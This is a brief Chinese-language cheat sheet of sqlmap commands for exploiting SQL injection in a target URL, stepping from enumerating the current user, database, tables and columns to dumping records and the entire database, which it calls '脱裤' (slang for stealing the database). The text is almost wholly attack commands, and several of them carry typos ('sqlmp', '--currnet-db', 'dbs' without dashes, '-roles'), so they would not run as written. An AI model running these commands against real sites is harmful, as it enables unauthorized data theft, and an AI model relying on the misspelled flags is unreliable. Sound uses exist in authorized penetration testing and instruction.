基本流程
扫描出部分系统信息
sqlmap -u "url"
sqlmp -u "url" --current-user
查询当前数据库用户名
sqlmap -u "url" --currnet-db
当前数据库
sqlmap -u "url" -D "db_name" --tables
根据这个库查表名
根据库,表查字段
sqlmap -u "url" -D "db_name" -T "tables_name" --columns
查记录
sqlmap -u "url" -D "db_name" -T "tables_name" -C "columns_name" --dump
信息获取
列出其他数据库
sqlmap -u "url" dbs
枚举数据库用户角色
sqlmap -u "url" -roles
脱裤
sqlmap -u "url" --dump-all
目录都在根目录下的./sqlmap下